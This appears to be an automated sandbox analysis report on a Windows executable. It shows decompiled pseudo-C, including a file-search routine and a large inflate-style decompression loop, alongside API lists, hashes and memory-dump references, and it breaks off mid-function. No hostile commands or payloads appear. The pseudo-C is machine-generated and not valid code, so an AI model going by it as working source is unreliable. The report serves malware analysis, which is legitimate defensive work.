                                                                                                                                                                                                          0x00402284
                                                                                                                                                                                                          0x0040228a
                                                                                                                                                                                                          0x00402291
                                                                                                                                                                                                          0x004022aa
                                                                                                                                                                                                          0x004022ac
                                                                                                                                                                                                          0x004022ba
                                                                                                                                                                                                          0x004022ba
                                                                                                                                                                                                          0x004022aa
                                                                                                                                                                                                          0x004022bd
                                                                                                                                                                                                          0x004022c3
                                                                                                                                                                                                          0x004022c3
                                                                                                                                                                                                          0x004022c6
                                                                                                                                                                                                          0x004022cc
                                                                                                                                                                                                          0x004022d2
                                                                                                                                                                                                          0x004022e7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004022d2
                                                                                                                                                                                                          0x004022dd
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?), ref: 004021F0
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                          • API String ID: 123533781-2935972921
                                                                                                                                                                                                          • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                                                                                                                                          • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061AB(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E0040624D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                                                                                                          0x004027b9
                                                                                                                                                                                                          0x004027cd
                                                                                                                                                                                                          0x004027d8
                                                                                                                                                                                                          0x004027d9
                                                                                                                                                                                                          0x00402918
                                                                                                                                                                                                          0x004027bb
                                                                                                                                                                                                          0x004027bb
                                                                                                                                                                                                          0x004027bd
                                                                                                                                                                                                          0x004027bf
                                                                                                                                                                                                          0x004027bf
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                          • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                                                                                                                                          • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406A9B, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                          			E00406A9B(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040720A( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3d0;
												if( *0x42e3d0 != 0) {
													L22:
													_t412 =  *0x40a444; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a448; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d24c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d248; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d250;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6d0;
													if(_t416 < 0x42d6d0) {
														L15:
														__eflags = _t416 - 0x42d48c;
														_t438 = 8;
														if(_t416 > 0x42d48c) {
															__eflags = _t416 - 0x42d650;
															if(_t416 >= 0x42d650) {
																__eflags = _t416 - 0x42d6b0;
																if(_t416 < 0x42d6b0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d250, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d250 + _t440;
														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
														 *0x42e3d0 =  *0x42e3d0 + 1;
														__eflags =  *0x42e3d0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
